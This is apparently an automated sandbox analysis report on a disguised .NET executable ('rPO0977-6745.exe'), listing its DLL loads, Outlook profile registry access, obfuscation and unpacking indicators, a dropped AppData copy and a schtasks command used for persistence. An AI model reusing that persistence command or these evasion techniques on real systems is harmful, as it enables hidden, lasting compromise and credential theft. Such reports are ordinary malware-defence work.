Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\rPO0977-6745.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\rPO0977-6745.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: rPO0977-6745.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: rPO0977-6745.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: rPO0977-6745.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ikFw.pdbSHA256 source: rPO0977-6745.exe, EDyxAgkldisLe.exe.0.dr
Source: Binary string: ikFw.pdb source: rPO0977-6745.exe, EDyxAgkldisLe.exe.0.dr

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: rPO0977-6745.exe, Main.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: EDyxAgkldisLe.exe.0.dr, Main.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.rPO0977-6745.exe.7820000.5.raw.unpack, bg.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, u5QKsh8eHYOmOLmsMj.cs .Net Code: UgIr7Bx3MP System.Reflection.Assembly.Load(byte[])
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, u5QKsh8eHYOmOLmsMj.cs .Net Code: UgIr7Bx3MP System.Reflection.Assembly.Load(byte[])
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, u5QKsh8eHYOmOLmsMj.cs .Net Code: UgIr7Bx3MP System.Reflection.Assembly.Load(byte[])
Source: 0.2.rPO0977-6745.exe.31b9118.0.raw.unpack, bg.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Binary contains a suspicious time stamp
Source: rPO0977-6745.exe Static PE information: 0x92C42B74 [Sat Jan 11 04:28:36 2048 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 0_2_02F75DFF push esp; iretd 0_2_02F75E19
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 0_2_08D19060 push esp; ret 0_2_08D19061
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 0_2_08D16589 pushad ; retf 0_2_08D16595
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 10_2_014424B9 push 8BFFFFFFh; retf 10_2_014424BF
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 10_2_06BBEC0E push es; iretd 10_2_06BBEC14
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 10_2_06BBDA48 push es; ret 10_2_06BBEB88
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 10_2_06BBEB92 push es; ret 10_2_06BBEB98
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 10_2_06BBEB8A push es; ret 10_2_06BBEB90
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 11_2_00D49C40 push 80028793h; iretd 11_2_00D49C6D
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 11_2_00D45DFF push esp; iretd 11_2_00D45E19
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_00E424B9 push 8BFFFFFFh; retf 23_2_00E424BF
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064EEA62 push es; ret 23_2_064EEA68
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064EEAFA push es; ret 23_2_064EEB00
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064EEBFE push es; iretd 23_2_064EEC14
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064EEB8E push es; ret 23_2_064EEB90
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064EEB96 push es; ret 23_2_064EEB98
Source: rPO0977-6745.exe Static PE information: section name: .text entropy: 7.966999305787785
Source: EDyxAgkldisLe.exe.0.dr Static PE information: section name: .text entropy: 7.966999305787785
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, u5QKsh8eHYOmOLmsMj.cs High entropy of concatenated method names: 'UfeMUo5y1v', 'fQEMZfLQSe', 'YIWMwESRIb', 'nheM4SnoOo', 'P5rMi4FG1p', 'AfbM2SjWH8', 'w8xMBhpK1O', 'wurMgSnPeu', 'BfAMWPoF7S', 'wxIMX9FS9M'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, Dqkyhukd5DPEpWtsrk.cs High entropy of concatenated method names: 'FXfHqnePF2', 'LJlHM8PTg9', 'KktHrtN9On', 'RIqHZ8tTmd', 'bVaHwKZMyw', 'PPKHiEt3nD', 'BDVH2o9gei', 'xxZxVXbO5M', 'I1txN1hGKZ', 'aZvxsqKfsL'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, hWtek0zyFhm6YOkDOc.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kQDHK9kAKh', 'sZOHva20V4', 'gpsHP3E4I8', 'J7kHncWDan', 'fP5HxGWwAm', 'PqVHHiEdX4', 'jB1H8kEhmZ'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, TVHBd5rBSDSNtLCLLd.cs High entropy of concatenated method names: 'kb349ddmYp', 'p3e4Fe62GZ', 'chD4kOZOyj', 'CG54dETV6i', 'UdI4vKn82q', 'Wav4PGVxjb', 'h674ntq847', 'f7x4xffHUW', 'k0V4Hi2k8B', 'kx648Q0hK3'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, YfsUVIwKwligCWwUFOb.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bnG8cVygMs', 'AaN83wkcge', 'xQV8OlU5SW', 'Clo8ltPJPP', 'j5L85oHMOm', 'M8Z8SF35wQ', 'DUx8VhEvZH'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, G3Zlh9sDOA6l6Xdsx8.cs High entropy of concatenated method names: 'DZbB68eDtN', 'w0VBEGkrX4', 'ba3B7STYAO', 'NAqB9yyHuo', 'Tq4BQrdWch', 'KdQBFbSOYQ', 'vhOBmSA7y9', 'NDYBkXFr9V', 'rBeBd9Np14', 'XdGBp89pF0'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, XiDiD0bdPoQPVP9xtF.cs High entropy of concatenated method names: 'PTB7Xl8Lg', 'ptN9WtRRJ', 'G2mFTCeDL', 'YFsm0uZk2', 'lSMdlxQnw', 'beZpXF6HW', 'EXWH6qvOMkFXXn3QF0', 'MtdmsOXKmHeqvKSwkR', 'jyxx1IsVW', 'tYj8qDndC'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, unupZHtXVeGThL8D36.cs High entropy of concatenated method names: 'Dispose', 'xSGqslOfB8', 'sZhfaKt1Ix', 'GX0GGnhRB4', 'vZmqIu1wMp', 'QIBqz63j3n', 'ProcessDialogKey', 'xIyfy6JAF8', 'I3VfqQ9noD', 'SsyffHPYUd'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, O5tYpwmEKrOLf39LE6.cs High entropy of concatenated method names: 'XGvnXdHnFM', 'A63nAkM5Lu', 'ToString', 'qaynZbEA2J', 'VjXnw6glXQ', 'dTGn4maneN', 'bpvniOqZrg', 'Ug7n2NtHRf', 'VmUnBukOp5', 'KIxngT4Mct'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, H9cpRKwuIODiPO2dgX1.cs High entropy of concatenated method names: 'sGrH6lKFlm', 'XBOHEqD2fL', 'PcCH7KSkKB', 'c1WH9Mj7Fp', 'ACpHQVtnFr', 'OF1HFXUT84', 'UQFHmDksYj', 'D4OHk6USwr', 'MpJHdMnRK7', 'NJgHpvPVEj'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, SuXDWccPOvK5odiT5e.cs High entropy of concatenated method names: 'iK1nNKbibZ', 'K3UnIws6oG', 'BWCxy1I7S6', 'e7lxqMH53I', 'Ap4n11XsBE', 'xhKnbrZNaq', 'ggYnC1sfcd', 'RbTnc3k0wf', 'Xjvn3f3N1M', 'tpvnOmb4Ed'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, bJvLSL34IERm7aJscU.cs High entropy of concatenated method names: 'wayKkZ9RBP', 'puvKdv7pUY', 'UuFKuNVxnF', 'PJ3KaXpo99', 'UfnKtrpiv4', 'anYKYMUZKX', 'N9FKD6oHoF', 'JpJKjnAsKb', 'QtPKhKQ3yp', 'bAKK1b5IUE'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, t2qt23C1ZO7pYQfAKA.cs High entropy of concatenated method names: 'PFrwcuErRw', 'jaKw339Vro', 'yICwOV6ZQ0', 'C51wlfrQt8', 'U8Rw57yZaN', 'bFswSrFH55', 'dwHwVSZWNr', 'nHxwN4GSE1', 'EZZwsJWbfg', 'OxkwICvhvw'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, AqBlQbya8Vp6IS1UoE.cs High entropy of concatenated method names: 'CIWvhRO41X', 'S6cvbOrMno', 'AmsvcXJCd1', 'Kf7v3tiAja', 'r0xvaUNTG0', 'OBhvJg0SQG', 'oBXvtp8SBS', 'h6wvYKekMn', 'jkbvTUORGv', 'DruvDPgK7o'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, J7ecEYjmNahUm7LApD.cs High entropy of concatenated method names: 'X4VxZx5Xql', 'nxvxwIZkVL', 'Qlsx49wevp', 'GZmxiTVV7H', 'wAQx2VPGe7', 'kyGxBF2OVP', 'Aj5xgeT7vs', 'UHOxWSyBas', 'DIBxX1ZY6s', 'kpAxAA2By6'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, dlx18wvlGuFkC3sMg9.cs High entropy of concatenated method names: 'zYR2UTS2kM', 'lad2whCgDl', 'Q5a2ixlUn7', 'jZN2BUe2CE', 'VcO2gCOmRM', 'Mhvi56u223', 'DI4iSLe1Sv', 'TPjiVLcja1', 's9HiN7ns9v', 'OUYisfV5c7'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, JdId2Rh2LV5U7y7cd7.cs High entropy of concatenated method names: 'b7hBZDC5ef', 'FC7B47v3wV', 'EDnB2QITTR', 'REw2I3j10i', 'S8D2zyY9wH', 'BvYBy1E3f5', 'R0lBqL0XHb', 'K1EBf85cjC', 'higBMo5JZ1', 'CQMBrQejWu'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, xZ2HP9w52KJ9j9OhmHp.cs High entropy of concatenated method names: 'j5OlLfGGYRY6v', 'FSRi4Xkureg2qrnOLtK', 'HbyZTtkrqlYbwyQYNrE', 'dejTo9kzXBlOLx6Fpan', 'fNjMQ3kcWsBLuycREpK', 'Ay37hjkZc54ugh41Gnm'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, xLOmlk5E6U3TdCC4SP.cs High entropy of concatenated method names: 'lf9qBSpsC5', 'fMiqgVSjJv', 'qHRqXAlLK4', 'zdeqAa451k', 'S1NqvTeapU', 'NxEqPdbByQ', 'c1TtPmNPclUlssDWLO', 'UX6XiLDvrYw6Mksvwp', 'sCuqqUySuJ', 'nxOqMyY6We'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, u5QKsh8eHYOmOLmsMj.cs High entropy of concatenated method names: 'UfeMUo5y1v', 'fQEMZfLQSe', 'YIWMwESRIb', 'nheM4SnoOo', 'P5rMi4FG1p', 'AfbM2SjWH8', 'w8xMBhpK1O', 'wurMgSnPeu', 'BfAMWPoF7S', 'wxIMX9FS9M'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, Dqkyhukd5DPEpWtsrk.cs High entropy of concatenated method names: 'FXfHqnePF2', 'LJlHM8PTg9', 'KktHrtN9On', 'RIqHZ8tTmd', 'bVaHwKZMyw', 'PPKHiEt3nD', 'BDVH2o9gei', 'xxZxVXbO5M', 'I1txN1hGKZ', 'aZvxsqKfsL'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, hWtek0zyFhm6YOkDOc.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kQDHK9kAKh', 'sZOHva20V4', 'gpsHP3E4I8', 'J7kHncWDan', 'fP5HxGWwAm', 'PqVHHiEdX4', 'jB1H8kEhmZ'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, TVHBd5rBSDSNtLCLLd.cs High entropy of concatenated method names: 'kb349ddmYp', 'p3e4Fe62GZ', 'chD4kOZOyj', 'CG54dETV6i', 'UdI4vKn82q', 'Wav4PGVxjb', 'h674ntq847', 'f7x4xffHUW', 'k0V4Hi2k8B', 'kx648Q0hK3'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, YfsUVIwKwligCWwUFOb.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bnG8cVygMs', 'AaN83wkcge', 'xQV8OlU5SW', 'Clo8ltPJPP', 'j5L85oHMOm', 'M8Z8SF35wQ', 'DUx8VhEvZH'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, G3Zlh9sDOA6l6Xdsx8.cs High entropy of concatenated method names: 'DZbB68eDtN', 'w0VBEGkrX4', 'ba3B7STYAO', 'NAqB9yyHuo', 'Tq4BQrdWch', 'KdQBFbSOYQ', 'vhOBmSA7y9', 'NDYBkXFr9V', 'rBeBd9Np14', 'XdGBp89pF0'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, XiDiD0bdPoQPVP9xtF.cs High entropy of concatenated method names: 'PTB7Xl8Lg', 'ptN9WtRRJ', 'G2mFTCeDL', 'YFsm0uZk2', 'lSMdlxQnw', 'beZpXF6HW', 'EXWH6qvOMkFXXn3QF0', 'MtdmsOXKmHeqvKSwkR', 'jyxx1IsVW', 'tYj8qDndC'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, unupZHtXVeGThL8D36.cs High entropy of concatenated method names: 'Dispose', 'xSGqslOfB8', 'sZhfaKt1Ix', 'GX0GGnhRB4', 'vZmqIu1wMp', 'QIBqz63j3n', 'ProcessDialogKey', 'xIyfy6JAF8', 'I3VfqQ9noD', 'SsyffHPYUd'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, O5tYpwmEKrOLf39LE6.cs High entropy of concatenated method names: 'XGvnXdHnFM', 'A63nAkM5Lu', 'ToString', 'qaynZbEA2J', 'VjXnw6glXQ', 'dTGn4maneN', 'bpvniOqZrg', 'Ug7n2NtHRf', 'VmUnBukOp5', 'KIxngT4Mct'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, H9cpRKwuIODiPO2dgX1.cs High entropy of concatenated method names: 'sGrH6lKFlm', 'XBOHEqD2fL', 'PcCH7KSkKB', 'c1WH9Mj7Fp', 'ACpHQVtnFr', 'OF1HFXUT84', 'UQFHmDksYj', 'D4OHk6USwr', 'MpJHdMnRK7', 'NJgHpvPVEj'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, SuXDWccPOvK5odiT5e.cs High entropy of concatenated method names: 'iK1nNKbibZ', 'K3UnIws6oG', 'BWCxy1I7S6', 'e7lxqMH53I', 'Ap4n11XsBE', 'xhKnbrZNaq', 'ggYnC1sfcd', 'RbTnc3k0wf', 'Xjvn3f3N1M', 'tpvnOmb4Ed'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, bJvLSL34IERm7aJscU.cs High entropy of concatenated method names: 'wayKkZ9RBP', 'puvKdv7pUY', 'UuFKuNVxnF', 'PJ3KaXpo99', 'UfnKtrpiv4', 'anYKYMUZKX', 'N9FKD6oHoF', 'JpJKjnAsKb', 'QtPKhKQ3yp', 'bAKK1b5IUE'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, t2qt23C1ZO7pYQfAKA.cs High entropy of concatenated method names: 'PFrwcuErRw', 'jaKw339Vro', 'yICwOV6ZQ0', 'C51wlfrQt8', 'U8Rw57yZaN', 'bFswSrFH55', 'dwHwVSZWNr', 'nHxwN4GSE1', 'EZZwsJWbfg', 'OxkwICvhvw'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, AqBlQbya8Vp6IS1UoE.cs High entropy of concatenated method names: 'CIWvhRO41X', 'S6cvbOrMno', 'AmsvcXJCd1', 'Kf7v3tiAja', 'r0xvaUNTG0', 'OBhvJg0SQG', 'oBXvtp8SBS', 'h6wvYKekMn', 'jkbvTUORGv', 'DruvDPgK7o'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, J7ecEYjmNahUm7LApD.cs High entropy of concatenated method names: 'X4VxZx5Xql', 'nxvxwIZkVL', 'Qlsx49wevp', 'GZmxiTVV7H', 'wAQx2VPGe7', 'kyGxBF2OVP', 'Aj5xgeT7vs', 'UHOxWSyBas', 'DIBxX1ZY6s', 'kpAxAA2By6'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, dlx18wvlGuFkC3sMg9.cs High entropy of concatenated method names: 'zYR2UTS2kM', 'lad2whCgDl', 'Q5a2ixlUn7', 'jZN2BUe2CE', 'VcO2gCOmRM', 'Mhvi56u223', 'DI4iSLe1Sv', 'TPjiVLcja1', 's9HiN7ns9v', 'OUYisfV5c7'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, JdId2Rh2LV5U7y7cd7.cs High entropy of concatenated method names: 'b7hBZDC5ef', 'FC7B47v3wV', 'EDnB2QITTR', 'REw2I3j10i', 'S8D2zyY9wH', 'BvYBy1E3f5', 'R0lBqL0XHb', 'K1EBf85cjC', 'higBMo5JZ1', 'CQMBrQejWu'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, xZ2HP9w52KJ9j9OhmHp.cs High entropy of concatenated method names: 'j5OlLfGGYRY6v', 'FSRi4Xkureg2qrnOLtK', 'HbyZTtkrqlYbwyQYNrE', 'dejTo9kzXBlOLx6Fpan', 'fNjMQ3kcWsBLuycREpK', 'Ay37hjkZc54ugh41Gnm'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, xLOmlk5E6U3TdCC4SP.cs High entropy of concatenated method names: 'lf9qBSpsC5', 'fMiqgVSjJv', 'qHRqXAlLK4', 'zdeqAa451k', 'S1NqvTeapU', 'NxEqPdbByQ', 'c1TtPmNPclUlssDWLO', 'UX6XiLDvrYw6Mksvwp', 'sCuqqUySuJ', 'nxOqMyY6We'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, u5QKsh8eHYOmOLmsMj.cs High entropy of concatenated method names: 'UfeMUo5y1v', 'fQEMZfLQSe', 'YIWMwESRIb', 'nheM4SnoOo', 'P5rMi4FG1p', 'AfbM2SjWH8', 'w8xMBhpK1O', 'wurMgSnPeu', 'BfAMWPoF7S', 'wxIMX9FS9M'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, Dqkyhukd5DPEpWtsrk.cs High entropy of concatenated method names: 'FXfHqnePF2', 'LJlHM8PTg9', 'KktHrtN9On', 'RIqHZ8tTmd', 'bVaHwKZMyw', 'PPKHiEt3nD', 'BDVH2o9gei', 'xxZxVXbO5M', 'I1txN1hGKZ', 'aZvxsqKfsL'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, hWtek0zyFhm6YOkDOc.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kQDHK9kAKh', 'sZOHva20V4', 'gpsHP3E4I8', 'J7kHncWDan', 'fP5HxGWwAm', 'PqVHHiEdX4', 'jB1H8kEhmZ'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, TVHBd5rBSDSNtLCLLd.cs High entropy of concatenated method names: 'kb349ddmYp', 'p3e4Fe62GZ', 'chD4kOZOyj', 'CG54dETV6i', 'UdI4vKn82q', 'Wav4PGVxjb', 'h674ntq847', 'f7x4xffHUW', 'k0V4Hi2k8B', 'kx648Q0hK3'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, YfsUVIwKwligCWwUFOb.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bnG8cVygMs', 'AaN83wkcge', 'xQV8OlU5SW', 'Clo8ltPJPP', 'j5L85oHMOm', 'M8Z8SF35wQ', 'DUx8VhEvZH'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, G3Zlh9sDOA6l6Xdsx8.cs High entropy of concatenated method names: 'DZbB68eDtN', 'w0VBEGkrX4', 'ba3B7STYAO', 'NAqB9yyHuo', 'Tq4BQrdWch', 'KdQBFbSOYQ', 'vhOBmSA7y9', 'NDYBkXFr9V', 'rBeBd9Np14', 'XdGBp89pF0'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, XiDiD0bdPoQPVP9xtF.cs High entropy of concatenated method names: 'PTB7Xl8Lg', 'ptN9WtRRJ', 'G2mFTCeDL', 'YFsm0uZk2', 'lSMdlxQnw', 'beZpXF6HW', 'EXWH6qvOMkFXXn3QF0', 'MtdmsOXKmHeqvKSwkR', 'jyxx1IsVW', 'tYj8qDndC'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, unupZHtXVeGThL8D36.cs High entropy of concatenated method names: 'Dispose', 'xSGqslOfB8', 'sZhfaKt1Ix', 'GX0GGnhRB4', 'vZmqIu1wMp', 'QIBqz63j3n', 'ProcessDialogKey', 'xIyfy6JAF8', 'I3VfqQ9noD', 'SsyffHPYUd'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, O5tYpwmEKrOLf39LE6.cs High entropy of concatenated method names: 'XGvnXdHnFM', 'A63nAkM5Lu', 'ToString', 'qaynZbEA2J', 'VjXnw6glXQ', 'dTGn4maneN', 'bpvniOqZrg', 'Ug7n2NtHRf', 'VmUnBukOp5', 'KIxngT4Mct'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, H9cpRKwuIODiPO2dgX1.cs High entropy of concatenated method names: 'sGrH6lKFlm', 'XBOHEqD2fL', 'PcCH7KSkKB', 'c1WH9Mj7Fp', 'ACpHQVtnFr', 'OF1HFXUT84', 'UQFHmDksYj', 'D4OHk6USwr', 'MpJHdMnRK7', 'NJgHpvPVEj'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, SuXDWccPOvK5odiT5e.cs High entropy of concatenated method names: 'iK1nNKbibZ', 'K3UnIws6oG', 'BWCxy1I7S6', 'e7lxqMH53I', 'Ap4n11XsBE', 'xhKnbrZNaq', 'ggYnC1sfcd', 'RbTnc3k0wf', 'Xjvn3f3N1M', 'tpvnOmb4Ed'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, bJvLSL34IERm7aJscU.cs High entropy of concatenated method names: 'wayKkZ9RBP', 'puvKdv7pUY', 'UuFKuNVxnF', 'PJ3KaXpo99', 'UfnKtrpiv4', 'anYKYMUZKX', 'N9FKD6oHoF', 'JpJKjnAsKb', 'QtPKhKQ3yp', 'bAKK1b5IUE'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, t2qt23C1ZO7pYQfAKA.cs High entropy of concatenated method names: 'PFrwcuErRw', 'jaKw339Vro', 'yICwOV6ZQ0', 'C51wlfrQt8', 'U8Rw57yZaN', 'bFswSrFH55', 'dwHwVSZWNr', 'nHxwN4GSE1', 'EZZwsJWbfg', 'OxkwICvhvw'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, AqBlQbya8Vp6IS1UoE.cs High entropy of concatenated method names: 'CIWvhRO41X', 'S6cvbOrMno', 'AmsvcXJCd1', 'Kf7v3tiAja', 'r0xvaUNTG0', 'OBhvJg0SQG', 'oBXvtp8SBS', 'h6wvYKekMn', 'jkbvTUORGv', 'DruvDPgK7o'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, J7ecEYjmNahUm7LApD.cs High entropy of concatenated method names: 'X4VxZx5Xql', 'nxvxwIZkVL', 'Qlsx49wevp', 'GZmxiTVV7H', 'wAQx2VPGe7', 'kyGxBF2OVP', 'Aj5xgeT7vs', 'UHOxWSyBas', 'DIBxX1ZY6s', 'kpAxAA2By6'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, dlx18wvlGuFkC3sMg9.cs High entropy of concatenated method names: 'zYR2UTS2kM', 'lad2whCgDl', 'Q5a2ixlUn7', 'jZN2BUe2CE', 'VcO2gCOmRM', 'Mhvi56u223', 'DI4iSLe1Sv', 'TPjiVLcja1', 's9HiN7ns9v', 'OUYisfV5c7'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, JdId2Rh2LV5U7y7cd7.cs High entropy of concatenated method names: 'b7hBZDC5ef', 'FC7B47v3wV', 'EDnB2QITTR', 'REw2I3j10i', 'S8D2zyY9wH', 'BvYBy1E3f5', 'R0lBqL0XHb', 'K1EBf85cjC', 'higBMo5JZ1', 'CQMBrQejWu'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, xZ2HP9w52KJ9j9OhmHp.cs High entropy of concatenated method names: 'j5OlLfGGYRY6v', 'FSRi4Xkureg2qrnOLtK', 'HbyZTtkrqlYbwyQYNrE', 'dejTo9kzXBlOLx6Fpan', 'fNjMQ3kcWsBLuycREpK', 'Ay37hjkZc54ugh41Gnm'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, xLOmlk5E6U3TdCC4SP.cs High entropy of concatenated method names: 'lf9qBSpsC5', 'fMiqgVSjJv', 'qHRqXAlLK4', 'zdeqAa451k', 'S1NqvTeapU', 'NxEqPdbByQ', 'c1TtPmNPclUlssDWLO', 'UX6XiLDvrYw6Mksvwp', 'sCuqqUySuJ', 'nxOqMyY6We'
Drops PE files
Source: C:\Users\user\Desktop\rPO0977-6745.exe File created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp"

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
